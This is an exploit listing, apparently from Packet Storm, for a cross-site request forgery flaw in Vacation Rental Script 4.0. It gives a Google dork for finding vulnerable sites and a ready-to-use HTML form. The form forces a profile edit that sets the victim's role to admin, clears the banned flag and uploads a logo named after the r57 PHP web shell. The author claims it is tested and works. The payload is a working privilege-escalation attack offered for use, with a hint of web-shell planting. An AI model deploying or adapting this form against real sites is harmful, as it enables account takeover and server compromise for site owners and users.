Vacation Rental Script 4.0 Cross Site Request Forgery

2010-12-25T00:00:00
ID PACKETSTORM:97012
Type packetstorm
Reporter OnurTURKESHAN
Modified 2010-12-25T00:00:00

Description

                                        
                                            `# Exploit Title: Vacation Rental Script v4.0 XSRF VULNERABILTY  
  
# Google Dork: "2006 - 2009 Vacation Rental Script"  
  
# Date: 24.12.2010  
  
# Author: OnurTURKESHAN  
  
# Software Link: http://www.vacationrentalscript.com/  
  
# Version: v.4.0  
  
# Tested on: v4.0 TEsted +WorKs  
#ResPecT My FrienDz : BARC0D3-SZE-BlackApple-Fl0rix-Sky_Lab-Ufuq-VoLqaN-KaBaDaYı-BraveHeart-CWScriptKiddiE-FinishedLife AND ALL MY FRIENDZ  
---------------------------------------------  
<form id="users_edit" method="post" action="http://SİTE.COM/home/members/profile/edit/MEMBERİD" enctype="multipart/form-data">  
<input type="hidden" name="profile_logo" id="profile_logo" value="r57.php-2.jpeg" />  
<input type="hidden" name="role" id="role" value="admin" />  
<input type="hidden" name="banned" id="banned" value="0" />  
<input class="text" type="text" id="user_name" name="user_name" value="USERNAME" />  
<input class="text" type="text" id="email" name="email" value="MAIL@MAIL.COM" />  
<input class="text" type="password" id="password" name="password" />  
<input class="text" type="password" id="retype_password" name="retype_password" />  
<input class="btn-orange" type="submit" value="Save profile" id="submit" name="submit" /><div class="btn-orange-end"> </div>  
  
</form>  
  
www.myfreshdate.com / www.onurturkeshan.com / www.cyber-warrior.org  
  
  
`